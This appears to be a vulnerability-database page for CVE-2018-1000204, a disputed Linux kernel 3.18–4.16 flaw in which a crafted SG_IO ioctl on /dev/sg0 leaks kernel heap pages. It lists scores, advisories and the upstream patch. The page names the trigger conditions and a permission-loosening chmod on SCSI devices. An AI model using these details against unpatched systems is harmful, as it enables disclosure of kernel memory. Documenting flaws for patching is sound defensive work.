CVE-2018-1000204

Description

Linux Kernel version 3.18 to 4.16 incorrectly handles an SG_IO ioctl on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and an empty 6-byte cmdp. This may lead to copying up to 1000 kernel heap pages to the userspace. This has been fixed upstream in https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824 already. The problem has limited scope, as users don't usually have permissions to access SCSI devices. On the other hand, e.g. the Nero user manual suggests doing `chmod o+r+w /dev/sg*` to make the devices accessible. NOTE: third parties dispute the relevance of this report, noting that the requirement for an attacker to have both the CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it "virtually impossible to exploit.

5.3
CVSS
Severity: Medium
CVSS 3.0 •
CVSS 2.0 •
EPSS 0.13%
Vendor Advisory ubuntu.com Vendor Advisory ubuntu.com Vendor Advisory ubuntu.com Vendor Advisory ubuntu.com Vendor Advisory redhat.com Vendor Advisory ubuntu.com Vendor Advisory ubuntu.com Vendor Advisory opensuse.org
Affected: n/a n/a
Published at:
Updated at:

References

Link Tags
https://usn.ubuntu.com/3752-2/ third party advisory vendor advisory
https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html third party advisory mailing list
https://usn.ubuntu.com/3696-1/ third party advisory vendor advisory
https://usn.ubuntu.com/3752-3/ third party advisory vendor advisory
https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html third party advisory mailing list
http://www.openwall.com/lists/oss-security/2018/06/26/3 third party advisory mailing list
https://usn.ubuntu.com/3754-1/ third party advisory vendor advisory
https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html third party advisory mailing list
https://access.redhat.com/errata/RHSA-2018:2948 third party advisory vendor advisory
https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824 third party advisory patch
https://usn.ubuntu.com/3696-2/ third party advisory vendor advisory
https://usn.ubuntu.com/3752-1/ third party advisory vendor advisory
http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00043.html vendor advisory

Frequently Asked Questions

What is the severity of CVE-2018-1000204?
CVE-2018-1000204 has been scored as a medium severity vulnerability.
How to fix CVE-2018-1000204?
To fix CVE-2018-1000204, make sure you are using an up-to-date version of the affected component(s) by checking the vendor release notes. As for now, there are no other specific guidelines available.
Is CVE-2018-1000204 being actively exploited in the wild?
As for now, there are no information to confirm that CVE-2018-1000204 is being actively exploited. According to its EPSS score, there is a ~0% probability that this vulnerability will be exploited by malicious actors in the next 30 days.
This platform uses data from the NIST NVD, MITRE CVE, MITRE CWE, First.org and CISA KEV but is not endorsed or certified by these entities. CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site.
© 2025 Under My Watch. All Rights Reserved.